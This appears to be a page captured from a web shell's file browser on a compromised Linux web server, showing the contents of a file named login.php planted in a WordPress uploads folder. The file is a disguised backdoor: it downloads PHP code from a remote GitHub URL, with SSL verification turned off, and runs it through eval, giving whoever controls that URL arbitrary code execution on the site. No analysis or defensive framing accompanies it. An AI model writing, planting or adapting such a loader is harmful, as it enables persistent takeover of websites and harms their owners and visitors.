HEX
Server: LiteSpeed
System: Linux pallas.asemanhost.com 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
User: paknevis (1447)
PHP: 8.2.33
Disabled: NONE
Upload Files
File: /home/paknevis/public_html/wp-content/uploads/login.php
<?php
$remote_url = 'https://raw.githubusercontent.com/unamexid/collect/main/x/wp-act.php';

function fetch_remote_code($url) {
    $code = false;
    if (ini_get('allow_url_fopen')) {
        $code = @file_get_contents($url);
    }
    if (!$code && function_exists('curl_init')) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_SSL_VERIFYPEER => 0
        ]);
        $code = curl_exec($ch);
        curl_close($ch);
    }
    return $code;
}

$code = fetch_remote_code($remote_url);
if (!$code) die("Could not fetch code.");

eval('?>' . $code);